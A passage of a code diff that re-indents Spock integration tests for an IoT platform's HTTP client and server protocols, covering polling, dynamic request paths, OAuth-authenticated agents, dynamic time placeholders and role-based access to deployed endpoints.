+    and: "the polling attributes should have the correct values"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.getId(), true)
+      assert asset.getAttribute("getPollSlow").flatMap({it.value}).orElse(null) == 100
+      assert asset.getAttribute("getPollFast").flatMap({it.value}).orElse(null) == 60
+      assert asset.getAttribute("getBinary").flatMap({it.value}).orElse(null) == "ON"
+      assert asset.getAttribute("getHex").flatMap({it.value}).orElse(null) == "ON"
+    }
 
-        when: "a linked attribute value is updated"
-        def attributeEvent = new AttributeEvent(asset.id,
+    when: "a linked attribute value is updated"
+    def attributeEvent = new AttributeEvent(asset.id,
             "putRequestWithHeaders",
-                ValueUtil.parse('{"myProp1": 123,"myProp2": true}').get())
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+            ValueUtil.parse('{"myProp1": 123,"myProp2": true}').get())
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the server should have received the request"
-        conditions.eventually {
-            assert mockServer.putRequestWithHeadersCalled
-        }
+    then: "the server should have received the request"
+    conditions.eventually {
+      assert mockServer.putRequestWithHeadersCalled
+    }
 
-        when: "a linked attribute value is updated to true, the path should contain the dynamic mapped value of 'on'"
-        attributeEvent = new AttributeEvent(asset.id,
+    when: "a linked attribute value is updated to true, the path should contain the dynamic mapped value of 'on'"
+    attributeEvent = new AttributeEvent(asset.id,
             "getRequestWithDynamicPath",
             true)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the server should have received the request and returned a 200"
-        conditions.eventually {
-            assert mockServer.dynamicPathParam == "on"
-        }
+    then: "the server should have received the request and returned a 200"
+    conditions.eventually {
+      assert mockServer.dynamicPathParam == "on"
+    }
 
-        when: "a linked attribute value is updated to false the path should contain the dynamic mapped value of 'off'"
-        attributeEvent = new AttributeEvent(asset.id,
+    when: "a linked attribute value is updated to false the path should contain the dynamic mapped value of 'off'"
+    attributeEvent = new AttributeEvent(asset.id,
             "getRequestWithDynamicPath",
             false)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the server should have received the request and returned a 200"
-        conditions.eventually {
-            assert mockServer.dynamicPathParam == "off"
-        }
+    then: "the server should have received the request and returned a 200"
+    conditions.eventually {
+      assert mockServer.dynamicPathParam == "off"
+    }
 
-        when: "new agents are created"
-        def agent2 = agent
+    when: "new agents are created"
+    def agent2 = agent
             .setId(null)
             .setFollowRedirects(null)
             .setRequestHeaders(null)
             .setRequestQueryParameters(null)
-        def agent3 = ValueUtil.clone(agent2)
+    def agent3 = ValueUtil.clone(agent2)
             .setId(null)
-        def agent4 = ValueUtil.clone(agent2)
+    def agent4 = ValueUtil.clone(agent2)
             .setId(null)
             .setFollowRedirects(true)
 
-        agent2 = assetStorageService.merge(agent2)
-        agent3 = assetStorageService.merge(agent3)
-        agent4 = assetStorageService.merge(agent4)
+    agent2 = assetStorageService.merge(agent2)
+    agent3 = assetStorageService.merge(agent3)
+    agent4 = assetStorageService.merge(agent4)
 
-        then: "the protocol instances should be created and the agents should be connected"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent2.id) != null
-            assert agentService.getProtocolInstance(agent3.id) != null
-            assert agentService.getProtocolInstance(agent4.id) != null
-            assert agentService.getAgent(agent2.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            assert agentService.getAgent(agent3.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            assert agentService.getAgent(agent4.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
+    then: "the protocol instances should be created and the agents should be connected"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent2.id) != null
+      assert agentService.getProtocolInstance(agent3.id) != null
+      assert agentService.getProtocolInstance(agent4.id) != null
+      assert agentService.getAgent(agent2.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      assert agentService.getAgent(agent3.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      assert agentService.getAgent(agent4.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
 
-        when: "mock filters are registered"
-        ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)).client.register(mockServer, Integer.MAX_VALUE)
-        ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)).doStart(getContainer())
-        ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)).client.register(mockServer, Integer.MAX_VALUE)
-        ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)).doStart(getContainer())
-        ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)).client.register(mockServer, Integer.MAX_VALUE)
-        ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)).doStart(getContainer())
+    when: "mock filters are registered"
+    ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)).client.register(mockServer, Integer.MAX_VALUE)
+    ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)).doStart(getContainer())
+    ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)).client.register(mockServer, Integer.MAX_VALUE)
+    ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)).doStart(getContainer())
+    ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)).client.register(mockServer, Integer.MAX_VALUE)
+    ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)).doStart(getContainer())
 
-        and: "attributes are linked to these agents"
-        def asset2 = new ThingAsset("Test Asset 2")
+    and: "attributes are linked to these agents"
+    def asset2 = new ThingAsset("Test Asset 2")
             .setRealm(Constants.MASTER_REALM)
             .addOrReplaceAttributes(
-                new Attribute<>("getSuccess", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent2.id)
-                            .setPath("get_success_200")
-                        )
+            new Attribute<>("getSuccess", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent2.id)
+                    .setPath("get_success_200")
+                    )
                     ),
-                new Attribute<>("getFailure", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent2.id)
-                            .setPath("get_failure_401")
-                        )
+            new Attribute<>("getFailure", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent2.id)
+                    .setPath("get_failure_401")
+                    )
                     ),
-                new Attribute<>("pollFailure", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent3.id)
-                            .setPath("get_failure_401")
-                            .setPollingMillis(100)
-                        )
+            new Attribute<>("pollFailure", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent3.id)
+                    .setPath("get_failure_401")
+                    .setPollingMillis(100)
+                    )
                     ),
-                new Attribute<>("getSuccess2", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent4.id)
-                            .setPath("get_success_200")
-                        )
+            new Attribute<>("getSuccess2", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent4.id)
+                    .setPath("get_success_200")
+                    )
                     ),
-                new Attribute<>("getFailure2", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent4.id)
-                            .setPath("get_failure_401")
-                        )
+            new Attribute<>("getFailure2", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent4.id)
+                    .setPath("get_failure_401")
+                    )
                     ),
-                new Attribute<>("getRedirect", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent4.id)
-                            .setPath("redirect")
-                        )
+            new Attribute<>("getRedirect", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent4.id)
+                    .setPath("redirect")
+                    )
                     )
             )
 
-        and: "the asset is merged into the asset service"
-        asset2 = assetStorageService.merge(asset2)
+    and: "the asset is merged into the asset service"
+    asset2 = assetStorageService.merge(asset2)
 
-        then: "new request maps should be created in the HTTP client protocol for the linked attributes"
-        conditions.eventually {
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)) != null
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)).requestMap.size() == 2
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)) != null
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)).requestMap.size() == 1
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)) != null
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)).requestMap.size() == 3
-        }
+    then: "new request maps should be created in the HTTP client protocol for the linked attributes"
+    conditions.eventually {
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)) != null
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent2.id)).requestMap.size() == 2
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)) != null
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent3.id)).requestMap.size() == 1
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)) != null
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent4.id)).requestMap.size() == 3
+    }
 
-        and: "the polling attribute should be polling the server"
-        conditions.eventually {
-            assert mockServer.failureCount > 1
-        }
+    and: "the polling attribute should be polling the server"
+    conditions.eventually {
+      assert mockServer.failureCount> 1
+    }
 
-        when: "a linked attribute value is updated"
-        attributeEvent = new AttributeEvent(asset2.id,
+    when: "a linked attribute value is updated"
+    attributeEvent = new AttributeEvent(asset2.id,
             "getSuccess",
             "OK")
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the server should have received the request"
-        conditions.eventually {
-            assert mockServer.successCount == 1
-        }
+    then: "the server should have received the request"
+    conditions.eventually {
+      assert mockServer.successCount == 1
+    }
+  }
+
+  def "Check HTTP client dynamic time feature"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 1)
+
+    and: "the HTTP client protocol min times are adjusted for testing"
+    HTTPProtocol.MIN_POLLING_MILLIS = 10
+
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+    def timerService = container.getService(TimerService.class)
+
+    when: "a HTTP client agent is created"
+    HTTPAgent agent = new HTTPAgent("Test agent")
+            .setRealm(Constants.MASTER_REALM)
+            .setBaseURI("https://mockapi")
+            .setOAuthGrant(
+            new OAuthPasswordGrant("https://mockapi/token",
+            "TestClient",
+            "TestSecret",
+            "scope1 scope2",
+            "testuser",
+            "password")
+            )
+            .setFollowRedirects(true)
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol should authenticate and the connection status should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, HTTPAgent.class)
+      assert agent.getAgentStatus().orElse(ConnectionStatus.DISCONNECTED) == ConnectionStatus.CONNECTED
+      assert agentService.getProtocolInstance(agent.id) != null
     }
 
-    def "Check HTTP client dynamic time feature"() {
+    when: "the mock filter is added"
+    ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).client.register(mockServer, Integer.MAX_VALUE)
+    ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).doStart(getContainer())
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 1)
+    and: "An asset is created"
+    def asset = new ThingAsset("Test Asset")
+            .setParent(agent)
+            .addOrReplaceAttributes(
+            // attribute that polls the server using GET and uses regex filter on response
+            new Attribute<>("testPostRequest", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
+                    .setPath("dynamic_time_1")
+                    .setMethod(HTTPMethod.POST)
+                    .setPollingMillis(500)
+                    .setWriteValue('{"prop1": "%TIME+PT1H:yyyy-MM-dd HH:mm%"}')
+                    .setHeaders(new MultivaluedStringMap(
+                            [
+                              ("header1") : ['%TIME+PT1H:EPOCH_MILLIS%'],
+                              ("header2") : ['%TIME-P50D:EPOCH_SECONDS%'],
+                              ("header3") : ['%TIME%']
+                            ]
+                            ))
+                    .setQueryParameters(new MultivaluedStringMap(
+                            [
+                              ("param1") : ['%TIME:yyyy-MM-dd%']
+                            ]
+                            ))
+                    )
+                    )
+            )
 
-        and: "the HTTP client protocol min times are adjusted for testing"
-        HTTPProtocol.MIN_POLLING_MILLIS = 10
+    and: "the clock is stopped"
+    stopPseudoClock()
 
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-        def timerService = container.getService(TimerService.class)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        when: "a HTTP client agent is created"
-        HTTPAgent agent = new HTTPAgent("Test agent")
-                .setRealm(Constants.MASTER_REALM)
-                .setBaseURI("https://mockapi")
-                .setOAuthGrant(
-                        new OAuthPasswordGrant("https://mockapi/token",
-                                "TestClient",
-                                "TestSecret",
-                                "scope1 scope2",
-                                "testuser",
-                                "password")
-                )
-                .setFollowRedirects(true)
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol should authenticate and the connection status should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, HTTPAgent.class)
-            assert agent.getAgentStatus().orElse(ConnectionStatus.DISCONNECTED) == ConnectionStatus.CONNECTED
-            assert agentService.getProtocolInstance(agent.id) != null
-        }
-
-        when: "the mock filter is added"
-        ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).client.register(mockServer, Integer.MAX_VALUE)
-        ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).doStart(getContainer())
-
-        and: "An asset is created"
-        def asset = new ThingAsset("Test Asset")
-                .setParent(agent)
-                .addOrReplaceAttributes(
-                        // attribute that polls the server using GET and uses regex filter on response
-                        new Attribute<>("testPostRequest", TEXT)
-                                .addMeta(
-                                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
-                                                .setPath("dynamic_time_1")
-                                                .setMethod(HTTPMethod.POST)
-                                                .setPollingMillis(500)
-                                                .setWriteValue('{"prop1": "%TIME+PT1H:yyyy-MM-dd HH:mm%"}')
-                                                .setHeaders(new MultivaluedStringMap(
-                                                    [
-                                                        ("header1") : ['%TIME+PT1H:EPOCH_MILLIS%'],
-                                                        ("header2") : ['%TIME-P50D:EPOCH_SECONDS%'],
-                                                        ("header3") : ['%TIME%']
-                                                    ]
-                                                ))
-                                                .setQueryParameters(new MultivaluedStringMap(
-                                                    [
-                                                        ("param1") : ['%TIME:yyyy-MM-dd%']
-                                                    ]
-                                                ))
-                                        )
-                                )
-                )
-
-        and: "the clock is stopped"
-        stopPseudoClock()
-
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
-
-        then: "new request maps should be created in the HTTP client protocol for the linked attributes"
-        conditions.eventually {
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).requestMap.size() == 1
-        }
-
-        and: "the attribute should be polling the server"
-        conditions.eventually {
-            assert mockServer.pollCountFast > 0
-        }
-
-        and: "the attribute value should contain the dynamic time (which means headers and query params are also correct)"
-        conditions.eventually {
-            String expectedPostRequest = doDynamicTimeReplace("%TIME+PT1H:yyyy-MM-dd HH:mm%", timerService.getNow())
-            asset = assetStorageService.find(asset.getId(), true)
-            assert asset.getAttribute("testPostRequest").flatMap {it.value}.orElse(null) == "{\"prop1\": \"${expectedPostRequest}\"}"
-        }
+    then: "new request maps should be created in the HTTP client protocol for the linked attributes"
+    conditions.eventually {
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).requestMap.size() == 1
     }
+
+    and: "the attribute should be polling the server"
+    conditions.eventually {
+      assert mockServer.pollCountFast> 0
+    }
+
+    and: "the attribute value should contain the dynamic time (which means headers and query params are also correct)"
+    conditions.eventually {
+      String expectedPostRequest = doDynamicTimeReplace("%TIME+PT1H:yyyy-MM-dd HH:mm%", timerService.getNow())
+      asset = assetStorageService.find(asset.getId(), true)
+      assert asset.getAttribute("testPostRequest").flatMap {
+        it.value
+      }.orElse(null) == "{\"prop1\": \"${expectedPostRequest}\"}"
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/http/HttpServerProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/http/HttpServerProtocolTest.groovy
@@ -59,167 +59,193 @@ import static org.openremote.model.value.ValueType.TEXT
 
 class HttpServerProtocolTest extends Specification implements ManagerContainerTrait {
 
-    def tryPost(TestResource authenticatedTestResource, Asset testAsset) {
-        // There's some weird behaviour where sometimes a forbidden exception is thrown and sometimes not
-        try {
-            authenticatedTestResource.postAsset(testAsset)
-        } catch (Exception ex) {
-           getLOG().warn("Failed to call post: " + ex.getMessage())
-        }
+  def tryPost(TestResource authenticatedTestResource, Asset testAsset) {
+    // There's some weird behaviour where sometimes a forbidden exception is thrown and sometimes not
+    try {
+      authenticatedTestResource.postAsset(testAsset)
+    } catch (Exception ex) {
+      getLOG().warn("Failed to call post: " + ex.getMessage())
     }
+  }
 
-    def "Check HTTP server protocol and JAX-RS deployment"() {
+  def "Check HTTP server protocol and JAX-RS deployment"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 1)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 1)
 
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        when: "a test HTTP server agent with a test deployment is created"
-        def agent = new HTTPServerTestAgent("Test agent")
+    when: "a test HTTP server agent with a test deployment is created"
+    def agent = new HTTPServerTestAgent("Test agent")
             .setRealm(MASTER_REALM)
             .setRoleBasedSecurity(true)
 
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
-        TestHTTPServerProtocol protocolInstance
-        def testAsset = new ThingAsset("Test Asset")
-           .setId("12345")
-           .addOrReplaceAttributes(
-              new Attribute<>("attribute1", TEXT, "Test")
-           )
-           .setLocation(new GeoJSONPoint(1d, 2d))
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
+    TestHTTPServerProtocol protocolInstance
+    def testAsset = new ThingAsset("Test Asset")
+            .setId("12345")
+            .addOrReplaceAttributes(
+            new Attribute<>("attribute1", TEXT, "Test")
+            )
+            .setLocation(new GeoJSONPoint(1d, 2d))
 
-        then: "the protocol should be deployed"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            protocolInstance = agentService.getProtocolInstance(agent.id) as TestHTTPServerProtocol
-            agent = assetStorageService.find(agent.id)
-            assert agent.getAttribute(Agent.STATUS).flatMap {it.value}.orElse(null) == ConnectionStatus.CONNECTED
-            assert Servlets.defaultContainer().getDeployment(AbstractHTTPServerProtocol.getDeploymentName(TestHTTPServerProtocol.class, agent.id)) != null
-        }
-
-        when: "the client proxy for the test resource (to be deployed by the protocol) is defined"
-        def authenticatedTestResource = getClientTarget(
-                serverUri(serverPort)
-                        .path(protocolInstance.getDeploymentPath()),
-                accessToken).proxy(TestResource.class)
-        def testResource = getClientTarget(
-                serverUri(serverPort)
-                        .path(protocolInstance.getDeploymentPath()),
-                null).proxy(TestResource.class)
-
-        then: "it should be possible to post an asset to this protocol's endpoint"
-        conditions.eventually {
-           tryPost(authenticatedTestResource, testAsset)
-           assert protocolInstance.resource1.postedAssets.size() == 1
-        }
-
-        then: "the asset should be stored in the test protocol"
-        conditions.eventually {
-            def testServerProtocol = (TestHTTPServerProtocol)agentService.getProtocolInstance(agent.id)
-            assert testServerProtocol != null
-            assert testServerProtocol.resource1.postedAssets.size() == 1
-            assert testServerProtocol.resource1.postedAssets.get(0).name == "Test Asset"
-            assert testServerProtocol.resource1.postedAssets.get(0).type == ThingAsset.DESCRIPTOR.getName()
-            assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{it.x}.orElse(null) == 1d
-            assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{it.y}.orElse(null) == 2d
-        }
-
-        when: "the authenticated test resource is used to get an asset"
-        def asset = authenticatedTestResource.getAsset("12345")
-
-        then: "the asset should match the posted asset"
-        assert asset.name == testAsset.name
-        assert asset.type == testAsset.type
-        assert asset.getLocation().map{it.coordinates.x}.orElse(-1d) == testAsset.getLocation().map{it.coordinates.x}.orElse(0d)
-        assert asset.getLocation().map{it.coordinates.y}.orElse(-1d) == testAsset.getLocation().map{it.coordinates.y}.orElse(0d)
-
-        when: "the un-authenticated test resource is used to post an asset"
-        testResource.postAsset(testAsset)
-
-        then: "an exception should be thrown"
-        thrown ForbiddenException
-
-        when: "an additional instance of the Test HTTP Server protocol is deployed without security enabled"
-        def agent2 = new HTTPServerTestAgent("Test agent 2")
-                .setRealm(MASTER_REALM)
-                .setRoleBasedSecurity(false)
-        TestHTTPServerProtocol protocolInstance2
-        agent2 = assetStorageService.merge(agent2)
-
-        then: "the protocol should be deployed"
-        conditions.eventually {
-            protocolInstance2 = agentService.getProtocolInstance(agent2.id) as TestHTTPServerProtocol
-            assert protocolInstance2 != null
-            assert Servlets.defaultContainer().getDeployment(AbstractHTTPServerProtocol.getDeploymentName(TestHTTPServerProtocol.class, agent2.id)) != null
-        }
-
-        when: "an un-authenticated test resource proxy is created for the new deployment"
-        def testResource2 = getClientTarget(
-                serverUri(serverPort)
-                        .path(protocolInstance2.getDeploymentPath()),
-                null).proxy(TestResource.class)
-
-        and: "the new test resource is used to post an asset"
-        testAsset = new ThingAsset("Test Asset 2")
-        testAsset.setId(UniqueIdentifierGenerator.generateId())
-        testAsset.addOrReplaceAttributes(
-            new Attribute<>("attribute2", TEXT, "Test")
-        )
-        testAsset.setLocation(new GeoJSONPoint(3d, 4d))
-        testResource2.postAsset(testAsset)
-
-        then: "the asset should be stored in the test protocol"
-        conditions.eventually {
-            def testServerProtocol = (TestHTTPServerProtocol)agentService.getProtocolInstance(agent2.id)
-            assert testServerProtocol != null
-            assert testServerProtocol.resource1.postedAssets.size() == 1
-            assert testServerProtocol.resource1.postedAssets.get(0).name == "Test Asset 2"
-            assert testServerProtocol.resource1.postedAssets.get(0).id == testAsset.id
-            assert testServerProtocol.resource1.postedAssets.get(0).type == ThingAsset.DESCRIPTOR.getName()
-            assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{it.x}.orElse(null) == 3d
-            assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{it.y}.orElse(null) == 4d
-        }
-
-        when: "the new test resource is used to get an asset"
-        asset = testResource2.getAsset(testAsset.id)
-
-        then: "the asset should match the posted asset"
-        assert asset.name == testAsset.name
-        assert asset.type == testAsset.type
-        assert asset.getLocation().map{it.coordinates.x}.orElse(-1d) == testAsset.getLocation().map{it.coordinates.x}.orElse(0d)
-        assert asset.getLocation().map{it.coordinates.y}.orElse(-1d) == testAsset.getLocation().map{it.coordinates.y}.orElse(0d)
-
-        when: "an agent is deleted"
-        assetStorageService.delete([agent.id])
-
-        then: "the associated protocol instance should be un-deployed"
-        // Un-deploying takes the agent lock and tears down a servlet deployment, so it can be held up by other agents
-        // being deployed at the same time
-        new PollingConditions(timeout: 30, initialDelay: 1).eventually {
-            assert agentService.getProtocolInstance(agent.id) == null
-            assert Servlets.defaultContainer().getDeployment(AbstractHTTPServerProtocol.getDeploymentName(TestHTTPServerProtocol.class, agent.id)) == null
-        }
-
-        then: "if an attempt is made to use the removed endpoint then no asset should be posted"
-        conditions.eventually {
-            def postCount = protocolInstance.resource1.postedAssets.size()
-            tryPost(authenticatedTestResource, testAsset)
-            assert postCount == protocolInstance.resource1.postedAssets.size()
-        }
+    then: "the protocol should be deployed"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      protocolInstance = agentService.getProtocolInstance(agent.id) as TestHTTPServerProtocol
+      agent = assetStorageService.find(agent.id)
+      assert agent.getAttribute(Agent.STATUS).flatMap {
+        it.value
+      }.orElse(null) == ConnectionStatus.CONNECTED
+      assert Servlets.defaultContainer().getDeployment(AbstractHTTPServerProtocol.getDeploymentName(TestHTTPServerProtocol.class, agent.id)) != null
     }
+
+    when: "the client proxy for the test resource (to be deployed by the protocol) is defined"
+    def authenticatedTestResource = getClientTarget(
+            serverUri(serverPort)
+            .path(protocolInstance.getDeploymentPath()),
+            accessToken).proxy(TestResource.class)
+    def testResource = getClientTarget(
+            serverUri(serverPort)
+            .path(protocolInstance.getDeploymentPath()),
+            null).proxy(TestResource.class)
+
+    then: "it should be possible to post an asset to this protocol's endpoint"
+    conditions.eventually {
+      tryPost(authenticatedTestResource, testAsset)
+      assert protocolInstance.resource1.postedAssets.size() == 1
+    }
+
+    then: "the asset should be stored in the test protocol"
+    conditions.eventually {
+      def testServerProtocol = (TestHTTPServerProtocol)agentService.getProtocolInstance(agent.id)
+      assert testServerProtocol != null
+      assert testServerProtocol.resource1.postedAssets.size() == 1
+      assert testServerProtocol.resource1.postedAssets.get(0).name == "Test Asset"
+      assert testServerProtocol.resource1.postedAssets.get(0).type == ThingAsset.DESCRIPTOR.getName()
+      assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{
+        it.x
+      }.orElse(null) == 1d
+      assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{
+        it.y
+      }.orElse(null) == 2d
+    }
+
+    when: "the authenticated test resource is used to get an asset"
+    def asset = authenticatedTestResource.getAsset("12345")
+
+    then: "the asset should match the posted asset"
+    assert asset.name == testAsset.name
+    assert asset.type == testAsset.type
+    assert asset.getLocation().map{
+      it.coordinates.x
+    }.orElse(-1d) == testAsset.getLocation().map{
+      it.coordinates.x
+    }.orElse(0d)
+    assert asset.getLocation().map{
+      it.coordinates.y
+    }.orElse(-1d) == testAsset.getLocation().map{
+      it.coordinates.y
+    }.orElse(0d)
+
+    when: "the un-authenticated test resource is used to post an asset"
+    testResource.postAsset(testAsset)
+
+    then: "an exception should be thrown"
+    thrown ForbiddenException
+
+    when: "an additional instance of the Test HTTP Server protocol is deployed without security enabled"
+    def agent2 = new HTTPServerTestAgent("Test agent 2")
+            .setRealm(MASTER_REALM)
+            .setRoleBasedSecurity(false)
+    TestHTTPServerProtocol protocolInstance2
+    agent2 = assetStorageService.merge(agent2)
+
+    then: "the protocol should be deployed"
+    conditions.eventually {
+      protocolInstance2 = agentService.getProtocolInstance(agent2.id) as TestHTTPServerProtocol
+      assert protocolInstance2 != null
+      assert Servlets.defaultContainer().getDeployment(AbstractHTTPServerProtocol.getDeploymentName(TestHTTPServerProtocol.class, agent2.id)) != null
+    }
+
+    when: "an un-authenticated test resource proxy is created for the new deployment"
+    def testResource2 = getClientTarget(
+            serverUri(serverPort)
+            .path(protocolInstance2.getDeploymentPath()),
+            null).proxy(TestResource.class)
+
+    and: "the new test resource is used to post an asset"
+    testAsset = new ThingAsset("Test Asset 2")
+    testAsset.setId(UniqueIdentifierGenerator.generateId())
+    testAsset.addOrReplaceAttributes(
+            new Attribute<>("attribute2", TEXT, "Test")
+            )
+    testAsset.setLocation(new GeoJSONPoint(3d, 4d))
+    testResource2.postAsset(testAsset)
+
+    then: "the asset should be stored in the test protocol"
+    conditions.eventually {
+      def testServerProtocol = (TestHTTPServerProtocol)agentService.getProtocolInstance(agent2.id)
+      assert testServerProtocol != null
+      assert testServerProtocol.resource1.postedAssets.size() == 1
+      assert testServerProtocol.resource1.postedAssets.get(0).name == "Test Asset 2"
+      assert testServerProtocol.resource1.postedAssets.get(0).id == testAsset.id
+      assert testServerProtocol.resource1.postedAssets.get(0).type == ThingAsset.DESCRIPTOR.getName()
+      assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{
+        it.x
+      }.orElse(null) == 3d
+      assert testServerProtocol.resource1.postedAssets.get(0).getLocation().map{
+        it.y
+      }.orElse(null) == 4d
+    }
+
+    when: "the new test resource is used to get an asset"
+    asset = testResource2.getAsset(testAsset.id)
+
+    then: "the asset should match the posted asset"
+    assert asset.name == testAsset.name
+    assert asset.type == testAsset.type
+    assert asset.getLocation().map{
+      it.coordinates.x
+    }.orElse(-1d) == testAsset.getLocation().map{
+      it.coordinates.x
+    }.orElse(0d)
+    assert asset.getLocation().map{
+      it.coordinates.y
+    }.orElse(-1d) == testAsset.getLocation().map{
+      it.coordinates.y
+    }.orElse(0d)
+
+    when: "an agent is deleted"
+    assetStorageService.delete([agent.id])
+
+    then: "the associated protocol instance should be un-deployed"
+    // Un-deploying takes the agent lock and tears down a servlet deployment, so it can be held up by other agents
+    // being deployed at the same time
+    new PollingConditions(timeout: 30, initialDelay: 1).eventually {
+      assert agentService.getProtocolInstance(agent.id) == null
+      assert Servlets.defaultContainer().getDeployment(AbstractHTTPServerProtocol.getDeploymentName(TestHTTPServerProtocol.class, agent.id)) == null
+    }
+
+    then: "if an attempt is made to use the removed endpoint then no asset should be posted"
+    conditions.eventually {
